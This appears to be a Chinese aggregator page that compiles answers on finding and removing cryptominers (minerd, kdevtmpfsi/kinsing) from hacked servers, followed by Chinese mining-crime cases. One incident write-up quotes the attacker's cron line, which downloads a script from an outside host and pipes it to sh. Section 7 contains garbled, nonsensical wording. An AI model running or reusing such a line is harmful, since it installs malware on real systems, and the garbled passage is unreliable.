服务器植入挖矿程序_求助服务器被挖矿程序入侵如何排查

　　1. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

　　1. 关闭访问挖矿服务器的访问

　　iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

　　2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

　　3. pkill minerd ,杀掉进程

　　4. service stop crond 或者 crontab -r 删除所有的执行计划

　　5. 执行top，查看了一会，没有再发现minerd 进程了。

　　6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

　　下载脚本的语句：

　　*/5 * * * * curl -fsSL https://www.haveabitchin.com/pm.sh？0105010 | sh

　　病毒文件内容如下，感兴趣的可以研究下：

　　View Code

　　解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，https://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

　　1. 修复 redis 的后门,

　　配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

　　配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

　　配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

　　好消息是Redis作者表示将会开发“real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

　　2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

　　3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

　　2. windows服务器的挖矿进程怎么关闭删除

　　这种病毒腾讯安全提到过

　　可以去下载安装一个腾讯御点

　　打开之后，使用里面的病毒查杀功能，直接就可以查杀这种电脑病毒了

　　3. 服务器被检测出挖矿

　　有位朋友说，他服务器使用的好好的，服务商突然封了他服务器，说是被检测出挖矿，这位朋友一脸懵“我开游戏的，挖什么矿”。突然地关停服务器导致这位朋友损失惨重，那么为什么会被检测出挖矿，以及怎么处理呢？感兴趣的话就继续往下看吧~

　　遇到以上问题，需要先找服务器商对其说明实际情况，配合他们排查，基本上就是中了挖矿病毒。

　　最简单的方法就是重装系统，但是系统盘数据都会清空，这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统，需要把自己的文件扫毒一遍确认安全后再导入服务器。

　　但是服务器里如果有很多重要的文件还有比较难配置的环境，那就需要排查删除挖矿程序，全盘扫毒，删除可疑文件，一个个修复病毒对系统的修改。

　　防范建议：

　　1.尽量不要使用默认密码和端口，改一个比较复杂的密码

　　2.可以使用宝塔面板登陆服务器

　　3.系统自带的防火墙、安全防护都不要关闭

　　4. 服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马

　　MongoDB库中的数据莫名其妙没有了，发觉如下信息：

　　1、 top -d 5命令 ，查看系统负载情况、是否有未知进程，发现一个名为kdevtmpfsi的进程，经科普它是一个挖矿程序，会占用服务器高额的CPU、内存资源。如图，CPU占用率高达788.7%，而且是yarn用户下：

　　2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径：/tmp/kdevtmpfsi

　　3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息（此时我的服务器并没有开启yarn服务，如果有yarn的相关进程则可判断是攻击者开启的进程），发现另外还有个kinsing进程，经科普kinsing进程是kdevtmpfsi的守护进程：

　　4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip，判断是kdevtmpfsi的发出者：

　　5、经查询该ip的所在国家是俄罗斯：

　　6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除：

　　7、 cd /tmp 进入相关目录：

　　8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序：

　　9、** kill -9 40422**杀掉kdevtmpfsi进程：

　　10、发现并没杀掉所有kdevtmpfsi进程，再次查找yarn的相关进程（因为之前已确认病毒是在yarn下），果真还有kdevtmpfsi进程存在：

　　11、用命令 批量杀掉 相关进程：

　　12、删除kinsing文件：

　　13、现在，已经把挖矿程序及相关进程删除掉了，但是还有两处没做处理：

　　14、 crontab -l 命令先看看crontab的定时任务列表吧：

　　15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh ：

　　16、新增 定时任务 并删除攻击者的挖矿定时任务：

　　17、 crontab -l命令 查看现在只有杀进程的定时任务了：

　　18、禁止黑客的IP地址。

　　最初安装MongoDB时，并未设置密码认证，存在漏洞，导致黑客通过漏洞攻击服务器，并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的，治标不治本，应该定时删除病毒进程，禁止攻击者IP，重新安装系统或相关软件。

　　经过几天的观察，服务器运行正常，再没有被黑客攻击成功。

　　5. 求助服务器被挖矿程序入侵，如何排查

　　新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

　　服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

　　会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

　　就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

　　户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

　　挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

　　仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

　　当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

　　对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

　　毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

　　客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

　　状况。

　　通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

　　发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

　　的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

　　SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

　　一切稳定运行，网站打开正常。

　　6. 如何查看电脑是否被植入了挖矿程序

　　如何判断自己的电脑是否被挖矿，怎样预防？

　　电脑开机后，所有程序都不打开的情况下。按Ctrl+ALT+Del调出任务管理器，在“进程”卡项中，查看CPU的使用情况。如果看到某个进程占用了大量的cpu使用情况，并且几分钟后都没有降低的趋势，这个程序就可能是病毒了。

　　想要预防自己的电脑被挖矿也很简单，只要安装正规的安全软件，使用安全的浏览器，添加安全合适的插件，就可以防止电脑被挖矿了。

　　当然，如果不浏览不正规不健康的网站，不下载盗版游戏，盗版软件等就更能从根源杜绝电脑被不法分子挖矿的风险。

　　7. 新买的云服务器提示挖矿

　　利用云电脑的计算资源执行挖矿的持续性程序,

　　已停止是服务绝大数都是正常的。这些已停止表示你已经禁用或停止了相关的服务，但停止不是卸载，所以它们仍然存在是正常的，每台电脑里都有许多已停止的差念服务，不用担心。你真正要担心的是360那个提示，可在任务管理器中查着虚兄困活动进程，若某进程CPU或内存占用高，而你又不明确该进程是尘肢干嘛的，可以先结束进程再看看360还会不会提醒!

　　8. 电脑挖矿违法吗

　　正常用着的电脑，却被非法控制，替别人“干活”，用户却浑然不知。原来，电脑被植入了挖矿程序及挖矿监控程序，监控程序只要监测到电脑CPU利用率低于50%，挖矿程序就会在后台静默启动，通过大量耗费被控电脑的CPU、GPU资源和电力资源，持续不断地挖取虚拟货币，并将这些虚拟货币转至控制者处，从而提现牟取暴利。

　　近期，潍坊市公安局网安支队会同青州市公安局在公安部、省公安厅指导下，在腾讯守护者计划安全团队协助下，按照公安部和省公安厅“净网2018专项行动”部署要求，成功破获部督“1.03”特大非法控制计算机信息系统案，目前抓获犯罪嫌疑人20名，取保候审11名，批捕9名。

　　经查，大连升平网络科技有限公司研发挖矿监控软件、集成挖矿程序后，通过发展下线代理，非法控制了全国389余万台电脑主机做广告增值收益，在100多万台电脑主机静默安装挖矿程序。两年期间共挖取DGB币（“极特币”）、DCR币（“德赛币”）、SC（“云产币”）币2600余万枚，共非法获利1500余万元。

　　据了解，虽然非法控制计算机信息系统的违法犯罪屡见不鲜，但是数量达到如此之巨，而且通过植入静默挖矿程序这种新型手段，进行虚拟货币变现，这在全国是比较少见的。

　　游戏外挂暗藏挖矿木马程序

　　2018年1月3日，潍坊市公安局网安支队接腾讯守护者计划安全团队报案称，腾讯电脑管家检测到一款游戏外挂暗藏了一款木马程序，该木马程序具备后台静默挖矿功能。

　　“挖矿，就是通过大量计算机运算获取数字货币-虚拟货币奖励，这个过程对电脑硬件配置要求比较高，主机经常长期高负荷运转，显卡、主板、内存等硬件会提前报废，对电脑的损害极大。”办案民警介绍。

　　办案民警说，违法犯罪人员通常提前调研市面上挖取难度较低的虚拟货币，通过云计算、显卡云计算业务非法控制用户的电脑主机，植入这种虚拟货币的挖矿程序进行挖矿，用户对此毫无察觉，只要电脑处于开机状态，挖矿程序就在后台静默运转，在挖取到大量矿币后迅速转至控制者那里变现提现，牟取高额利润。

　　初步统计，该木马程序感染数十万台用户机器。潍坊市公安局网安支队接案后，迅速研判案件线索，通过互联网提取到外挂木马样本，找到木马开发者建立的木马交流群，初步落查发现该款木马程序开发者在青州市。市局网安支队将该案情通报青州市公安局，由市局网安支队、青州市局成立专案组，对该案立案侦查。

　　专案组确定交流群群主身份为杨某宝。通过侦查发现，杨某宝一是建立了多个外挂讨论群，在群文件中共享外挂程序；二是利用“天下网吧论坛”版主的身份，将上传含有木马的外挂程序到“天下网吧”论坛供网民下载；三是通过网络网盘进行分享下载。

　　3月8日，专案组制定了详细的抓捕方案，在家中将杨某宝抓获。

　　9. top cpu飙高,中了挖矿程序----解决方法

　　1.发现cpu异常,查看对应的进程信息

　　2.查看进程发现是挖矿进程在执行

　　3.确定是挖矿病毒,查看进程的执行文件链接到哪里,发现是jenkins的工作目录,最后结果发现是jenkins的漏洞导致自动创建CI计划,进行启动挖矿脚本

　　4.查看虚机密码是否被破解登录

　　5.查找挖矿文件

　　6.检查定时任务脚本

　　jenkins CVE-2018-1999002 漏洞修复: https://paper.seebug.org/648/

　　jenkings漏洞利用: https://xz.aliyun.com/t/4756

　　CI安全隐患: https://www.jianshu.com/p/8939aaec5f25

　　jenkins漏洞描述地址: https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/

　　10. 蔚来员工利用公司服务器挖矿，这一行为是否违法

　　蔚来员工利用职务之便，从2021年2月开始使用公司服务器进行挖矿，从中获取利益，这个行为明显已经触犯了我国的相关法律。

　　其实利用公司资源进行非法挖矿行为早有先例，在2018年1月到5月期间，网络一个运维员工就曾经在网络公司服务器上安装挖矿程序，通过公司的资源谋取暴利，之后将挖矿所得的虚拟货币卖出，从中获得10万元人民币，后来，在网络公司的追查下，这名员工才被发现，并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年，并处罚金1.1万元，扣押违法所得10万元整。

　　而对于挖矿这个行为，国家是坚决打击的，目前相关的省份也出台了相关的文件，表面上只是提高了挖矿公司的电费，实际上是为了让从事挖矿的人员知难而退，因为电费一旦上涨，那么相对应的挖矿成本也就增加了。

　　综上所述，该蔚来员工利用职务之便进行挖矿行为，已经涉嫌非法控制计算机信息系统罪，所以，他极有可能会因为此罪名而被起诉。